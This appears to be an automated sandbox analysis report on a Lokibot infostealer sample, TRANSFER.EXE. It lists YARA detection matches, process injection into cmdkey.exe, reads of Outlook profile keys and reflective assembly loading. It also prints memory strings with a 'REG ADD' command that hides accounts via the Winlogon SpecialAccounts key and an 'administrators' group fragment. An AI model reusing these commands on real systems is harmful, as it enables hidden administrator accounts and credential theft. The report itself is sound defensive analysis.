                Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000000.389104727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: Process Memory Space: TRANSFER.EXE PID: 5732, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: cmdkey.exe PID: 5816, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_010411E0
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_0104A080
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01043B08
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_0104DBF8
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_010475A8
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_0104EDC0
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_0104BC50
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01043610
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_0104AEF8
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01047BC8
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01047BD8
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01049538
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01045D50
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01047FE0
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01047FF0
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_05210C28
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_0040549C
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_004029D4
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 00405B6F appears 42 times
                Source: TRANSFER.EXE, 00000000.00000002.409970337.0000000003C25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.409728288.0000000003BBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.409614394.0000000003B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.408533574.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.409413902.0000000003AFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.409458499.0000000003B1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.410134655.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.410134655.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.409879608.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.409509692.0000000003B53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCVrn Qme.exe2 vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000002.410666456.0000000004FC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZakrytyeKupla.exe< vs TRANSFER.EXE
                Source: TRANSFER.EXE, 00000000.00000000.368338240.00000000006A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualStudio.Services.Search.Shared.WebApi.dllb! vs TRANSFER.EXE
                Source: TRANSFER.EXEBinary or memory string: OriginalFilenameMicrosoft.VisualStudio.Services.Search.Shared.WebApi.dllb! vs TRANSFER.EXE
                Source: TRANSFER.EXEVirustotal: Detection: 24%
                Source: TRANSFER.EXEReversingLabs: Detection: 15%
                Source: TRANSFER.EXEStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\TRANSFER.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\TRANSFER.EXE "C:\Users\user\Desktop\TRANSFER.EXE"
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess created: C:\Windows\SysWOW64\cmdkey.exe C:\Windows\SysWOW64\cmdkey.exe
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess created: C:\Windows\SysWOW64\cmdkey.exe C:\Windows\SysWOW64\cmdkey.exe
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\TRANSFER.EXEFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TRANSFER.EXE.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@3/3@34/1
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: TRANSFER.EXEStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\TRANSFER.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\cmdkey.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Windows\SysWOW64\cmdkey.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\TRANSFER.EXEFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: TRANSFER.EXEStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: TRANSFER.EXEStatic file information: File size 1517568 > 1048576
                Source: TRANSFER.EXEStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: TRANSFER.EXEStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x171e00
                Source: TRANSFER.EXEStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: TRANSFER.EXEStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\v2.0\A1\_work\56\obj\Release.AnyCPU\Search.Client.Shared\MS.VS.Services.Search.Shared.WebApi\Microsoft.VisualStudio.Services.Search.Shared.WebApi.pdb source: TRANSFER.EXE

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3b05550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.cmdkey.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3ae5530.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.cmdkey.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3b05550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.cmdkey.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TRANSFER.EXE.3ae5530.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.409970337.0000000003C25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409421719.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409728288.0000000003BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409614394.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.408476159.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.637716959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409458499.0000000003B1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409336982.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390107800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.389788702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.389487311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390702511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.390434456.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409879608.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.409509692.0000000003B53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TRANSFER.EXE PID: 5732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cmdkey.exe PID: 5816, type: MEMORYSTR
                Source: TRANSFER.EXE, u005bA28u005d_u005bA43F069u005d/u005bC7Eu005d_u005b74F2B70u005d.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.TRANSFER.EXE.6a0000.0.unpack, u005bA28u005d_u005bA43F069u005d/u005bC7Eu005d_u005b74F2B70u005d.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_0104D1C8 push eax; mov dword ptr [esp], edx
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_01046D1A push eax; ret
                Source: C:\Users\user\Desktop\TRANSFER.EXECode function: 0_2_050B0501 push eax; retf
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_00402AC0 push eax; ret
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 1_2_00402AC0 push eax; ret

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                Source: TRANSFER.EXE, 00000000.00000002.410543531.0000000004510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\TRANSFER.EXEProcess information set: NOOPENFILEERRORBOX
